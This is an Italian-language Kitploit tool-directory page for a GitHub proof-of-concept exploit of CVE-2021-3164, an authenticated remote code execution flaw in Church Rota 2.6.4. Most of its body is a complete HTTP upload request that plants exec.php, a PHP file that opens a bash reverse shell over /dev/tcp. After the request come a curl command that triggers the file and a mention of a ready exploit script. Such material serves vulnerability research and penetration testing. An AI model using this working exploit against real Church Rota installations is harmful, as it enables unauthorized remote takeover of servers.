Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2021-3164 — Church Rota versione 2.6.4 è vulnerabile all'esecuzione remota di codice autenticata. L'utente non necessita di autorizzazione per il caricamento di file per caricare ed eseguire un file arbitrario. L'applicazione è scritta principalmente in PHP, quindi utilizziamo PHP nel nostro PoC. | Kitploit
Strumenti/GitHubGitHub/rmccarth/cve-2021-3164
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubrmccarth/cve-2021-3164

cve-2021-3164

Vedi Repository
25 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Church Rota versione 2.6.4 è vulnerabile all'esecuzione remota di codice autenticata. L'utente non necessita di autorizzazione per il caricamento di file per caricare ed eseguire un file arbitrario. L'applicazione è scritta principalmente in PHP, quindi utilizziamo PHP nel nostro PoC.

Condividi

Church Rota versione 2.6.4 è vulnerabile all'esecuzione remota di codice autenticata. L'utente non necessita di avere il permesso di caricamento file per caricare ed eseguire un file arbitrario.

Dopo aver effettuato l'accesso a Church Rota, invia la seguente richiesta, sostituendo con il tuo PHPSESSID:

root@kitploit:~
POST /resources.php?action=newsent HTTP/1.1

Host: localhost:8081

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------78920178725041013532564196488

Content-Length: 571

Origin: http://localhost:8081

Connection: close

Referer: http://localhost:8081/resources.php?action=new

Cookie: PHPSESSID=ivaa0ck3snt9ajlm0od9d7lh4j

Upgrade-Insecure-Requests: 1

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcename"

exec

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcefile"; filename="exec.php"

Content-Type: text/plain

<?php

exec("/bin/bash -c 'bash -i > /dev/tcp/127.0.0.1/1234 0>&1'");

?>


-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcedescription"



<p>text file upload</p>

-----------------------------78920178725041013532564196488--

Il file può quindi essere eseguito con il seguente comando:

root@kitploit:~
curl localhost:80/documents/exec.php

oppure facendo clic sul file sotto 'risorse' nell'interfaccia web.

Oppure installa semplicemente pwntools e requests con pip e poi configura ed esegui lo script exploit cve-2021-3164.py fornito.

Scarica lo strumento